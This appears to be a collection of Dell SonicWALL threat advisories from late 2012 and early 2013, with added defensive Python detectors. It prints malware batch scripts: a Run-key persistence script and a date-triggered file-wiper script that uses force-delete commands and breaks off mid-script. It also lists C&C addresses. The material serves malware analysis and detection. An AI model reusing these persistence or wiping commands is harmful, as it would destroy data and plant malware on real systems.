Novell NetIQ eDirectory NCP Buffer Overflow (Jan 23, 2013)

Novell eDirectory is an X.500-compatible directory service software product initially released in 1993 by Novell for centrally managing access to resources on multiple servers and computers within a given network. The product is made available for multiple platforms including NetWare, Unix-like systems, and Windows. It supports referential integrity, multi-master replication, and has a modular authentication architecture. The software can be accessed via LDAP, DSML, SOAP, ODBC, JDBC, JNDI, and ADSI.

Novell eDirectory uses the Novell NetWare Core Protocol (NCP) for network communication. NCP manages access to the primary NetWare server resources, such as the file system and the printing system, as well as login requests. NCP is a client/server protocol that originally ran over the Internetwork Packet Exchange (IPX) layer services, which are now obsolete; more recent versions of NCP can also use TCP/IP. NCP over TCP/IP messages have the following common header structure:

 Offset  Size  Description
 ------  ----  ------------------------------------------------------
 0x0000  4     NCP/IP signature, 'DmdT' for request, 'tNcP' for reply
 0x0004  4     NCP/IP Length, including the NCP over IP header
 0x0008  4     NCP/IP Version (Request only)
 0x000C  4     NCP/IP Reply Buffer Size (Request only)
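As an added illustration (not part of the original alert), the following Python parses the NCP over TCP/IP header laid out above and refuses any message whose length field disagrees with the header size or with the bytes actually received. The fields are read in network byte order; MAX_NCP_MESSAGE is this example's own policy limit, not a protocol constant, and the sample messages are constructed for the example rather than captured traffic.

```python
import struct

# NCP over IP signatures from the header table above.
NCP_SIG_REQUEST = b"DmdT"
NCP_SIG_REPLY = b"tNcP"
NCP_REQUEST_HEADER_LEN = 16  # signature, length, version, reply buffer size
NCP_REPLY_HEADER_LEN = 8     # signature, length only

# Policy limit of this example (assumption): anything larger is rejected before any copy.
MAX_NCP_MESSAGE = 64 * 1024


class NcpHeaderError(ValueError):
    """Raised when an NCP/IP header is malformed or its length field is inconsistent."""


def parse_ncp_ip_header(data: bytes) -> dict:
    """Parse the NCP over TCP/IP header at the start of `data` and validate its length.

    The length field is checked against the header size, the policy limit and the number
    of bytes actually received, so the payload slice can never exceed what was received.
    That is exactly the check whose absence lets a payload overrun a fixed-size buffer.
    """
    if len(data) < NCP_REPLY_HEADER_LEN:
        raise NcpHeaderError("truncated: signature and length need 8 bytes")
    signature = data[:4]
    if signature == NCP_SIG_REQUEST:
        kind, header_len = "request", NCP_REQUEST_HEADER_LEN
    elif signature == NCP_SIG_REPLY:
        kind, header_len = "reply", NCP_REPLY_HEADER_LEN
    else:
        raise NcpHeaderError("unknown NCP/IP signature %r" % signature)
    (length,) = struct.unpack(">I", data[4:8])  # network byte order
    if length < header_len:
        raise NcpHeaderError("length %d is smaller than the %d-byte header" % (length, header_len))
    if length > MAX_NCP_MESSAGE:
        raise NcpHeaderError("length %d exceeds policy maximum %d" % (length, MAX_NCP_MESSAGE))
    if length > len(data):
        raise NcpHeaderError("length %d exceeds the %d bytes received" % (length, len(data)))
    header = {"kind": kind, "length": length}
    if kind == "request":
        header["version"], header["reply_buffer_size"] = struct.unpack(">II", data[8:16])
    header["payload"] = data[header_len:length]
    return header


def is_well_formed(data: bytes) -> bool:
    """Filter-style wrapper: True only when the header passes every check."""
    try:
        parse_ncp_ip_header(data)
        return True
    except NcpHeaderError:
        return False


# Constructed sample messages (not captured traffic).
SAMPLE_REQUEST = b"DmdT" + struct.pack(">III", 20, 1, 512) + b"abcd"
SAMPLE_REPLY = b"tNcP" + struct.pack(">I", 12) + b"wxyz"
# Length field claims 1 MiB while only a few bytes follow: rejected before any copy.
SAMPLE_OVERSIZED = b"DmdT" + struct.pack(">III", 0x100000, 1, 512) + b"abcd"

if __name__ == "__main__":
    print(parse_ncp_ip_header(SAMPLE_REQUEST))
    print(parse_ncp_ip_header(SAMPLE_REPLY))
    print(is_well_formed(SAMPLE_OVERSIZED))
```

A sensor that wants to flag the pattern the IPS signatures above target has the same information available: a request whose length field is inconsistent with the header or the received data is what to alert on, and the parser rejects it before anything is copied.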

A stack-based overflow vulnerability has been identified in the Novell eDirectory server. When processing an NCP request, the size of a stack buffer was not validated before user-supplied data was copied into it. An attacker can exploit this vulnerability to cause a stack overflow, which allows arbitrary code injection and execution with the privileges of the eDirectory service, by default SYSTEM.

Dell SonicWALL UTM team has researched this vulnerability and released the following IPS signatures to detect the attack attempts.

  • 9541 Novell NetIQ eDirectory NCP Buffer Overflow 1
  • 9546 Novell NetIQ eDirectory NCP Buffer Overflow 2

An existing generic shellcode signature is able to detect the attacks addressing this issue too.

  • 4813 Server Application Shellcode Exploit 6

This vulnerability is identified as CVE-2012-0432.

Red October cyber-espionage malware uses MS Office exploits (Jan 18, 2013)

The Dell Sonicwall Threats research team received reports of malware that has targeted international diplomatic service agencies. The malware named Red October is part of a large scale cyber-espionage network that has been in existence since 2007. It is designed to steal sensitive information from infected systems. The malware uses GAV: CVE-2012-0158 (Exploit) and GAV: CVE-2010-3333 (Exploit) that exploit known vulnerabilities in unpatched versions of Microsoft Word and Excel. There have also been reports of the malware using Java vulnerabilities: GAV: CVE-2011-3544 (Exploit). It is reported that the Trojan is spread via email and uses infected Word and Excel files.

Infection cycle:

The file containing the exploit may be a legitimate but infected Word or Excel file. In this case it was an Excel file:

After the exploit has run successfully it will cause Excel to display a spreadsheet containing fake corporate data in order to thwart suspicion:

The Trojan adds the following keys to the windows registry:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit “%WINDIR%\system32\userinit.exe,%PROGRAMFILES%\Windows NT\svchost.exe”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-6948-B838-A1A0-B0132CCF0BA1} @ “D74C3FB1”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-7657-A727-BEBF-AF0C33D014BE} @ “C85320AE”

The Trojan adds the following files to the filesystem:

  • %PROGRAMFILES%\Windows NT\lhafd.gcp
  • %PROGRAMFILES%\Windows NT\svchost.exe [Detected as GAV: Rocra.A (Trojan)]
  • %TEMP%\msc.bat
  • %TEMP%\Dsc.tmp [Detected as GAV: Kolab.ABVR (Worm)]
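The Winlogon Userinit modification above is a persistence technique worth checking for on its own, independently of this sample. The following Python is an added example, not code from the alert: it splits a Userinit value into its comma-separated entries and reports anything other than the standard userinit.exe path, and separately flags any svchost.exe that does not live in the system32 directory. The values it checks are constructed from the registry entry listed above; folding the C:\Windows and C:\WinNT roots into %WINDIR% and looking only at the 32-bit system32 path are this example's assumptions.

```python
import ntpath

# The only entry a clean Userinit value should contain (Windows appends a trailing comma).
EXPECTED_USERINIT = r"%windir%\system32\userinit.exe"

# Concrete roots folded into %WINDIR% for comparison (assumption of this example).
WINDOWS_ROOTS = (r"c:\windows", r"c:\winnt")


def normalize_path(path: str) -> str:
    """Lower-case, strip surrounding quotes and replace a concrete Windows root with %windir%."""
    p = path.strip().strip('"').lower()
    for root in WINDOWS_ROOTS:
        if p.startswith(root + "\\"):
            p = "%windir%" + p[len(root):]
    return p


def unexpected_userinit_entries(value: str) -> list:
    """Return the Userinit entries (original spelling) that are not the standard userinit.exe."""
    entries = [e.strip() for e in value.split(",")]
    return [e for e in entries if e and normalize_path(e) != EXPECTED_USERINIT]


def misplaced_svchost(paths) -> list:
    """Return every path named svchost.exe whose directory is not the %windir% system32 directory."""
    flagged = []
    for p in paths:
        n = normalize_path(p)
        if ntpath.basename(n) == "svchost.exe" and ntpath.dirname(n) != r"%windir%\system32":
            flagged.append(p)
    return flagged


# Constructed inputs: the Userinit value from the registry key above, and a clean one.
INFECTED_USERINIT = r"%WINDIR%\system32\userinit.exe,%PROGRAMFILES%\Windows NT\svchost.exe"
CLEAN_USERINIT = r"C:\Windows\system32\userinit.exe,"

if __name__ == "__main__":
    extra = unexpected_userinit_entries(INFECTED_USERINIT)
    print("unexpected Userinit entries:", extra)
    print("svchost.exe outside system32:", misplaced_svchost(extra))
    print("clean value:", unexpected_userinit_entries(CLEAN_USERINIT))
```

Any extra Userinit entry is worth an alert by itself, since Winlogon runs every entry at logon; the svchost.exe check catches the second trick this sample relies on, a system file name placed in a non-system directory.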

msc.bat contains the following post-infection clean up code:

      chcp 1251
      :Repeat
      attrib -a -s -h -r "%TEMP%\Dcs.tmp"
      del "%TEMP%\Dcs.tmp"
      if exist "%TEMP%\Dcs.tmp" goto Repeat
      del "%TEMP%\msc.bat"

The chcp command suggests that the malware is Russian in origin. 1251 is the ANSI codepage for Cyrillic.

The Trojan was observed querying microsoft.com to verify internet connectivity:

The Trojan was observed using the CreateEvent API in order to be alerted of various system events:

The Trojan steals information from the following web browsers:

  • Google Chrome
  • Mozilla Firefox
  • Internet Explorer
  • Opera

We observed the Trojan reading data from files written by Firefox that we had installed on the system:

It is widely reported that the Trojan contains the ability to update and add modules from a remote Command & Control server.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Exploit.CVE-2012-0158 (Exploit)
  • GAV: Exploit.CVE-2010-3333 (Exploit)
  • GAV: Exploit.CVE-2011-3544 (Exploit)
  • GAV: Kolab.ABVR (Worm)
  • GAV: Rocra.A (Trojan)

Ruby on Rails Vulnerabilities (Jan 16, 2013)

Ruby on Rails (RoR) is an open source full-stack web application framework for the Ruby programming language. Ruby on Rails emphasizes the use of well-known software engineering patterns and principles, such as “Active record pattern”, “Convention over Configuration”, “Don’t Repeat Yourself” and “Model-View-Controller”.

During the past weeks several RoR vulnerabilities have emerged. The first is an SQL injection attack. By utilizing two different vulnerabilities, CVE-2012-6496 and CVE-2012-6497, an attacker could inject and execute arbitrary SQL queries. However, in order to perform the SQL injection the attacker needs to tamper with the session cookie. This makes both attacking and detecting attacks difficult, since both require knowledge of the session secret (cracking the HMAC key).

The second is a remote code execution vulnerability (CVE-2013-0156). The vulnerability is due to a design error when deserializing user-provided YAML (“YAML Ain’t Markup Language”, a data serialization format) strings; eventually the module_eval() function executes the parsed YAML strings, which allows execution of shell commands. An attacker could exploit this vulnerability by sending crafted POST requests to the RoR server. Successful exploitation results in arbitrary code execution within the context of the web service.
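As an added example (not from the alert), the following Python inspects a POST body the way a request filter in front of a Rails application might: it flags XML parameters carrying a type="yaml" or type="symbol" attribute, the attribute values that the vulnerable XML parameter parser handed on to YAML deserialization and symbol conversion. The function and constant names are this example's own, the request samples are constructed, and the element marked type="yaml" holds a harmless placeholder string rather than an exploit document.

```python
import xml.etree.ElementTree as ET

# Attribute values the vulnerable XML parameter parser handed to YAML / Symbol conversion.
# A client has no legitimate reason to send either, so any occurrence is reportable.
DANGEROUS_XML_TYPES = {"yaml", "symbol"}

# Content types for which Rails selects the XML parameter parser.
XML_CONTENT_TYPES = {"application/xml", "text/xml"}


def dangerous_xml_param_types(body: str) -> list:
    """Return (tag, type) for every element whose type attribute is yaml or symbol.

    A body that is not well-formed XML yields an empty list: the framework's XML
    parser would have rejected it too, so this check has nothing to say about it.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    hits = []
    for elem in root.iter():
        declared = (elem.get("type") or "").strip().lower()
        if declared in DANGEROUS_XML_TYPES:
            hits.append((elem.tag, declared))
    return hits


def should_block(headers: dict, body: str) -> bool:
    """True when the request declares an XML body and that body carries a yaml/symbol typed element."""
    content_type = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if content_type not in XML_CONTENT_TYPES:
        return False
    return bool(dangerous_xml_param_types(body))


# Constructed sample bodies. The first has the shape of an abusive request but carries
# only a placeholder string; the second is an ordinary XML parameter body.
SUSPICIOUS_BODY = '<?xml version="1.0"?><user><name type="yaml">--- placeholder</name></user>'
BENIGN_BODY = '<?xml version="1.0"?><user><name>alice</name><age type="integer">30</age></user>'
XML_HEADERS = {"Content-Type": "application/xml; charset=utf-8"}

if __name__ == "__main__":
    print(dangerous_xml_param_types(SUSPICIOUS_BODY))
    print(should_block(XML_HEADERS, SUSPICIOUS_BODY), should_block(XML_HEADERS, BENIGN_BODY))
```

The content-type gate mirrors how Rails picks its parameter parser from the declared Content-Type, so a filter should register the same media types the application accepts. On the application side, the workaround published with the advisory was to remove the "yaml" and "symbol" entries from ActiveSupport::XmlMini::PARSING; upgrading to a fixed release is the actual remedy, and a filter like this one is only a stopgap and a detection aid.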

Dell SonicWALL has released IPS signatures to detect and block specific exploitation attempts targeting CVE-2013-0156. The signatures are listed below:

  • 9486 Ruby on Rails SqlLiteral SQL Injection
  • 9487 Ruby on Rails Remote Code Execution 1
  • 9488 Ruby on Rails Remote Code Execution 2

Over the past week Dell SonicWALL has observed several exploit attempts targeting CVE-2013-0156; however, the volume is very low.

New Java 0-day drive-by exploit (Jan 10, 2013)

The Dell Sonicwall Threats research team received reports of a new 0-day exploit affecting Java 1.7 Update 9, 10 and possibly earlier versions of Java. It has been reported that this new exploit has already been integrated into the existing Blackhole Exploit Kit that is currently in use by cyber criminals. At the time of writing, this vulnerability is currently unpatched.

Infection cycle:

The infection occurs when visiting a malicious webpage that may look similar to the one below:

The webpage contains a malicious Blackhole Exploit script [Detected as GAV: Blacole.gen_26 (Exploit)]:

The script downloads additional jar files with class files containing GAV: Exploit.CVE-2013-0422 (Exploit)

From our analysis and sources we discovered 3 jar files that contain the Java exploit:

  • Counsel.jar [Detected as GAV: Exploit.CVE-2013-0422 (Exploit)]
  • Edit.jar [Detected as GAV: Exploit.CVE-2013-0422 (Exploit)]
  • UTTER-OFFEND.JAR [Detected as GAV: Exploit.CVE-2013-0422 (Exploit)]

The class file ewjvaiwebvhtuai124a.class, which contains the exploit, also embeds additional raw class file data; a class file typically starts with the magic bytes CAFEBABE:

The class file contains instructions to download and execute a malicious executable: calc.exe:
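The embedded-class-data observation above translates directly into a triage heuristic. The following Python is an added example, not the alert's own tooling: it opens a JAR in memory and reports every .class entry that contains a second CAFEBABE magic value after its own header. The JAR it scans is constructed inside the block from two minimal class-file stubs, so no real class files are needed to exercise the check.

```python
import io
import zipfile

CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # first four bytes of every Java class file


def embedded_class_offsets(class_bytes: bytes) -> list:
    """Offsets of CAFEBABE magic values found after the class file's own 4-byte magic."""
    offsets = []
    pos = class_bytes.find(CLASS_MAGIC, 4)
    while pos != -1:
        offsets.append(pos)
        pos = class_bytes.find(CLASS_MAGIC, pos + 4)
    return offsets


def scan_jar(jar_bytes: bytes) -> dict:
    """Map each .class entry that embeds further class data to the offsets where it starts.

    Entries that do not begin with the class magic are skipped: they are not class
    files, and a different heuristic should judge them.
    """
    findings = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for info in jar.infolist():
            if not info.filename.lower().endswith(".class"):
                continue
            data = jar.read(info)
            if not data.startswith(CLASS_MAGIC):
                continue
            offsets = embedded_class_offsets(data)
            if offsets:
                findings[info.filename] = offsets
    return findings


def build_sample_jar() -> bytes:
    """Constructed sample: a plain class stub and a stub that carries a whole class file inside it."""
    plain = CLASS_MAGIC + b"\x00\x00\x00\x33" + b"\x00" * 32  # magic, version 51, padding
    carrier = CLASS_MAGIC + b"\x00\x00\x00\x33" + b"\x00" * 16 + plain + b"\x00" * 8
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("Plain.class", plain)
        jar.writestr("Carrier.class", carrier)
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_jar(build_sample_jar()))
```

Treat a hit as a signal for closer inspection rather than a verdict: a constant-pool string can legitimately contain those four bytes, and the same magic marks Mach-O universal binaries, so a class that embeds an unrelated resource will also trigger it.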

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Exploit.CVE-2013-0422 (Exploit)
  • GAV: Blacole.gen_26 (Exploit)
  • GAV: CoolEK.Java.1 (Exploit)

Yet another Toll Fraud malware for Android (January 11, 2013)

Dell Sonicwall Threats Research Team received reports of a new Toll Fraud Android malware spreading in the wild. Toll Fraud is a scheme in which the victim is billed for a service requested by a malicious party without the victim's knowledge. This malware sends SMS messages to premium rate numbers and sends device-related information to the Command and Control (C&C) servers. This information is used to spread the malware further.

Over the last year there has been a steep rise in Toll Fraud malware for Android. Recent reports and statistics have shown that such malware has sapped millions of dollars from victims all over the world. Its primary means of spreading is through malicious apps; victims are enticed into downloading such apps through links sent in emails and SMS messages.

The malware requests the following permissions during installation:

  • Internet
  • Receive_Boot_Completed
  • Read_Phone_State
  • Receive_Sms
  • Read_Contacts
  • Send_Sms
  • Write_External_Storage
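The permission set above is typical of SMS toll fraud, and a decoded manifest is enough to score it. The following Python is an added example, not the alert's tooling: it reads the uses-permission entries from an AndroidManifest.xml that has already been decoded to text (assumption: the binary manifest was converted beforehand, for instance with apktool) and reports which toll-fraud capabilities the declared permissions cover. The grouping of permissions into capabilities and the decision threshold are this example's own assumptions, and the sample manifest is constructed from the list above.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Capabilities the sample above needs, expressed as the permission sets that grant them.
# The grouping is this example's assumption, not an Android or vendor definition.
CAPABILITIES = {
    "premium_sms": {"android.permission.SEND_SMS"},
    "sms_interception": {"android.permission.RECEIVE_SMS"},
    "device_exfiltration": {"android.permission.INTERNET", "android.permission.READ_PHONE_STATE"},
    "contact_harvesting": {"android.permission.READ_CONTACTS", "android.permission.INTERNET"},
    "boot_persistence": {"android.permission.RECEIVE_BOOT_COMPLETED"},
}


def declared_permissions(manifest_xml: str) -> set:
    """Collect the android:name value of every uses-permission element in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    names = set()
    for elem in root.iter("uses-permission"):
        name = elem.get(ANDROID_NS + "name")
        if name:
            names.add(name)
    return names


def covered_capabilities(permissions: set) -> list:
    """Capabilities whose permission set is fully granted, in CAPABILITIES order."""
    return [label for label, needed in CAPABILITIES.items() if needed <= permissions]


def looks_like_toll_fraud(permissions: set) -> bool:
    """Decision rule (assumption): premium SMS plus at least two supporting capabilities."""
    caps = covered_capabilities(permissions)
    return "premium_sms" in caps and len(caps) >= 3


def build_manifest(*permission_names) -> str:
    """Build a minimal decoded manifest declaring the given permissions (constructed input)."""
    lines = ['<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.sample">']
    lines += ['  <uses-permission android:name="%s"/>' % n for n in permission_names]
    lines.append("</manifest>")
    return "\n".join(lines)


# Constructed manifests: the permission list reported above, and a benign app with network access only.
SAMPLE_MANIFEST = build_manifest(
    "android.permission.INTERNET", "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.READ_PHONE_STATE", "android.permission.RECEIVE_SMS",
    "android.permission.READ_CONTACTS", "android.permission.SEND_SMS",
    "android.permission.WRITE_EXTERNAL_STORAGE",
)
BENIGN_MANIFEST = build_manifest("android.permission.INTERNET")

if __name__ == "__main__":
    perms = declared_permissions(SAMPLE_MANIFEST)
    print(sorted(perms))
    print(covered_capabilities(perms), looks_like_toll_fraud(perms))
```

A legitimate messaging app also declares SEND_SMS and RECEIVE_SMS, so the rule is a triage filter for an analyst's queue rather than a verdict; what makes this sample stand out is the full set of capabilities together with an app that visibly does nothing when launched.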

Upon installation the malware is visible in the app drawer as follows:

Infection Cycle

If the user clicks on the installed app, it does not appear to do anything. But in the background the app is busy transferring all contacts on the device to the C&C along with vital device related information. The following information was seen being transferred in the first run of the app as a POST query:

  • IMEI
  • IMSI
  • Android Version
  • Contacts

Contacts on the device are sent in a Contacts.xml file. The following screenshot shows contents of the Contacts.xml file:

After the first run the following information is periodically sent to the attacker:

  • IMEI
  • IMSI
  • Time
  • Android Version

The malware expects to receive a file named Connect.php.xml which contains key information sent by the attacker. We found checks in the malware's code for the following elements:

  • Send
    • number – SMS is sent to this number
    • text – Content of the SMS sent
  • Delete
    • number – SMS sent to this number will not be stored in the message archive

Once the malware receives this file, it starts sending SMS to the numbers specified in the file which are usually Premium Rate Numbers.

The malware is capable of accepting commands from the C&C in the form of SMS messages. Commands are of the format ServerKey+Command. The server key can be seen hardcoded in the malware:


We found two commands in the code which are scanned for in every incoming SMS:

  • 001
  • 002

We sent a plain SMS followed by SMS messages in the ServerKey+Command format to the malware in our labs. The messages that followed the right format could not be seen in the inbox or in the messages database. The message notification for such SMS is suppressed using abortBroadcast().

During our analysis we observed the malware connecting to the following link:

  • http://load-center.ru/connect.php

We found the following link in the malware code:

  • http://stat.load-center.ru/replies.php

The main source of income for this malware is Toll Fraud. The malware also harvests potential targets from the victim's contact list, to whom it can spread further by sending SMS messages containing links to download malicious apps.

Dell SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: Stealer.F (Trojan)

Microsoft Security Bulletin Coverage (Jan 8, 2013)

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of January, 2013. A list of issues reported, along with Dell SonicWALL coverage information, follows:

MS13-001 Vulnerability in Windows Print Spooler Components Could Allow Remote Code Execution

  • CVE-2013-0011 Windows Print Spooler Components Vulnerability
    No known exploits exist in the wild.

MS13-002 Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution

  • CVE-2013-0006 MSXML Integer Truncation Vulnerability
    No feasible way to detect attacks without a large number of false positives.
  • CVE-2013-0007 MSXML XSLT Vulnerability
    No feasible way to detect attacks without a large number of false positives.

MS13-003 Vulnerabilities in System Center Operations Manager Could Allow Elevation of Privilege

  • CVE-2013-0009 System Center Operations Manager Web Console XSS Vulnerability
    No feasible way to detect attacks without a large number of false positives.
  • CVE-2013-0010 System Center Operations Manager Web Console XSS Vulnerability
    IPS:9473 – Microsoft System Center Operations Manager XSS

MS13-004 Vulnerabilities in .NET Framework Could Allow Elevation of Privilege

  • CVE-2013-0001 System Drawing Information Disclosure Vulnerability
    No known exploits exist in the wild.
  • CVE-2013-0002 WinForms Buffer Overflow Vulnerability
    No known exploits exist in the wild.
  • CVE-2013-0003 S.DS.P Buffer Overflow Vulnerability
    No known exploits exist in the wild.
  • CVE-2013-0004 Double Construction Vulnerability
    No known exploits exist in the wild.

MS13-005 Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege

  • CVE-2013-0008 Win32k Improper Message Handling Vulnerability
    This is a local EoP vulnerability; detection of attacks on the wire is not possible.

MS13-006 Vulnerability in Microsoft Windows Could Allow Security Feature Bypass

  • CVE-2013-0013 Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability
    IPS:9472 – SSL Version Rollback

MS13-007 Vulnerability in Open Data Protocol Could Allow Denial of Service

  • CVE-2013-0005 Replace Denial of Service Vulnerability
    IPS:9471 – Open Data Protocol DoS

Squid Resource Exhaustion Vulnerability (Jan 4, 2013)

Squid is a popular open source proxy server and web cache daemon. It has a wide variety of uses, including sharing network resources, speeding up a web server and aiding network security (by filtering traffic).

A resource exhaustion vulnerability exists in Squid. Specifically, the vulnerability is due to a lack of sanitization of user-supplied parameters sent to Squid’s cache manager “cachemgr.cgi”. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to the Squid server. Successful exploitation allows the attacker to cause memory exhaustion, leading to a denial of service condition.

The vulnerability has been assigned CVE-2012-5643.

Dell SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 9450 Squid cachemgr.cgi DoS

Windows IE Button Element Use-After-Free (Dec 31, 2012)

Microsoft released an out-of-band Microsoft Security Advisory (2794220) addressing an IE vulnerability on Dec 29th, 2012. The vulnerability affects Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8; Internet Explorer 9 and Internet Explorer 10 are not affected. The vulnerability is identified as CVE-2012-4792.

Dell SonicWALL UTM team researched this vulnerability as soon as possible and created two IPS signatures to capture the attack traffic. The IPS signatures are listed below:

  • 9445 Windows IE Button Element Use-After-Free 1
  • 9446 Windows IE Button Element Use-After-Free 2

For the Microsoft vulnerabilities covered by Dell SonicWALL, please refer to SonicWALL MAPP for details.

Update: we have also released another SonicAlert, IE 0 day used in watering hole attacks (Jan 2, 2013), addressing a specific exploit in the wild.

IE 0 day used in watering hole attacks (Jan 2, 2013)

Dell SonicWALL UTM Research team received reports of a new zero day exploit targeting Internet Explorer being employed in watering hole attacks. These attacks target a use-after-free vulnerability in Internet Explorer version 8 running on Windows XP or Windows 7 operating systems. Versions 6 and 7 of Internet Explorer are also vulnerable to this exploit but were not targeted in this attack. This vulnerability is documented under CVE-2012-4792 and Microsoft has released an advisory for it.

A watering hole attack involves planting exploits and payload on compromised sites which are likely to be visited by the victims being targeted. In this case, the site of a think tank headquartered in the US and the site of an organization selling energy generation equipment, also headquartered in the US, were compromised and the exploits were loaded on to them. The attacks targeted visitors of these sites with a Backdoor Trojan.

Infection Cycle

The exploit is attempted using an SWF and multiple JavaScript components. The exploit is only attempted if the Flash plugin is installed, the IE version is 8, specific language packs are installed and Java version 6 is installed. On successful exploitation, it leads to the download and execution of a Backdoor Trojan.

The initial DLL payload is XOR’ed using the key ‘0x83’ and is decrypted by the SWF component. This in turn drops a Backdoor Trojan which does the following:

  • It creates a copy of itself appended with a random overlay (different hash/footprint in each infection):
    %COMMONPROGRAMFILES%\DirectDB.exe [Detected as “GAV: Shyape.B (Trojan)”]
  • It creates an instance of iexplorer.exe and injects code into it
  • It attempts to contact a remote server which was found to be offline at the time of analysis. The initial request intercepted with the aid of a simulated server is shown below:
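A single-byte XOR wrapper like the ‘0x83’ one above is cheap to spot without knowing the key in advance. The following Python is an added example (not the alert's own analysis code): for each of the 256 possible keys it looks for the XOR-transformed MZ signature followed, within the DOS header region, by the transformed DOS stub message, and reports the key and offset of every hit. The blob it scans is constructed in the block, a minimal fake DOS header XOR'ed with 0x83 and prefixed with filler bytes; it is not an executable.

```python
DOS_STUB_TEXT = b"This program cannot be run in DOS mode"
MZ_MAGIC = b"MZ"
DOS_HEADER_WINDOW = 512  # the stub message sits shortly after the 64-byte DOS header


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the transform is its own inverse)."""
    return bytes(b ^ key for b in data)


def find_single_byte_xor_pe(blob: bytes) -> list:
    """Return (key, offset) pairs where an XOR-encoded PE image appears to start.

    Rather than decoding the whole blob 256 times, the two markers are encoded with each
    candidate key and searched for directly; key 0 therefore also reports a plain PE.
    """
    hits = []
    for key in range(256):
        encoded_mz = xor_bytes(MZ_MAGIC, key)
        encoded_stub = xor_bytes(DOS_STUB_TEXT, key)
        start = 0
        while True:
            offset = blob.find(encoded_mz, start)
            if offset == -1:
                break
            if blob.find(encoded_stub, offset, offset + DOS_HEADER_WINDOW) != -1:
                hits.append((key, offset))
                break
            start = offset + 1
    return hits


def recover_pe(blob: bytes, key: int, offset: int) -> bytes:
    """Decode the embedded image from the reported offset to the end of the blob."""
    return xor_bytes(blob[offset:], key)


def build_sample_blob() -> bytes:
    """Constructed sample: a fake DOS header and stub (not a real executable), XOR'ed with 0x83
    and preceded by 16 filler bytes, mirroring how the payload above was wrapped."""
    fake_pe = MZ_MAGIC + b"\x90" * 62 + b"\x0e\x1f\xba\x0e\x00" + DOS_STUB_TEXT + b".\r\n$" + b"\x00" * 64
    return b"\x11" * 16 + xor_bytes(fake_pe, 0x83)


if __name__ == "__main__":
    blob = build_sample_blob()
    for key, offset in find_single_byte_xor_pe(blob):
        print("key=0x%02x offset=%d" % (key, offset), recover_pe(blob, key, offset)[:2])
```

The heuristic only covers a fixed single-byte key; a rolling or multi-byte key, or a payload whose DOS stub text was stripped, needs a different approach such as looking for the PE header fields or the section table instead.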

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Bogidow.A (Exploit)
  • GAV: Bifrose.N (Trojan)
  • GAV: Shyape.A (Trojan)
  • GAV: Shyape.B (Trojan)
  • IPS: 9445 Windows IE Button Element Use-After-Free 1
  • IPS: 9446 Windows IE Button Element Use-After-Free 2

New File Wiper Trojan targeting Iran (Dec 21, 2012)

The Dell Sonicwall Threats research team received reports of a new file wiper Trojan. The purpose of this Trojan is quite simple: delete files on a range of specified drives on specified dates. These can be remote storage devices or local external storage, as long as they are mounted under certain drive letters. It has been widely reported that the attack is targeted and the Trojan is aimed at affecting Iranian computers.

Infection cycle:

The Trojan adds the following files to the filesystem. These files are contained in the rar compressed portion of the original binary [Detected as GAV: DelFiles.NBV (Trojan)]:

  • %SYSTEM32%\jucheck.exe [Detected as GAV: Batchwiper.A (Trojan)]
  • %SYSTEM32%\juboot.exe [Detected as GAV: Batchwiper.A (Trojan)]
  • %SYSTEM32%\SLEEP.EXE [non-malicious sleep utility]
  • %USERPROFILE%\Local Settings\Temp\E.tmp\juboot.bat [dropped by juboot.exe]
  • %USERPROFILE%\Local Settings\Temp\11.tmp\jucheck.bat [dropped by jucheck.exe]

The Trojan adds the following key to the windows registry to enable startup after reboot:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jucheck.exe “%SYSTEM32%\jucheck.exe”

The file juboot.bat contains the following data that is used to initiate infection:

      @echo off & setlocal
      sleep for 2
      REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
      start "" /D"%systemroot%\system32" "jucheck.exe"

The file jucheck.bat contains the following data which causes all files on the desktop and in drives D: through I: to be wiped on the specified dates:

      @echo off & setlocal
      sleep for 2
      del "%systemroot%\system32\juboot.exe" /q /s /f
      del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
      if "%date%"=="Mon 12/10/2012" goto yes
      if "%date%"=="Tue 12/11/2012" goto yes
      if "%date%"=="Wed 12/12/2012" goto yes
      if "%date%"=="Mon 01/21/2013" goto yes
      if "%date%"=="Tue 01/22/2013" goto yes
      if "%date%"=="Wed 01/23/2013" goto yes
      if "%date%"=="Mon 05/06/2013" goto yes
      if "%date%"=="Tue 05/07/2013" goto yes
      if "%date%"=="Wed 05/08/2013" goto yes
      if "%date%"=="Mon 07/22/2013" goto yes
      if "%date%"=="Tue 07/23/2013" goto yes
      if "%date%"=="Wed 07/24/2013" goto yes
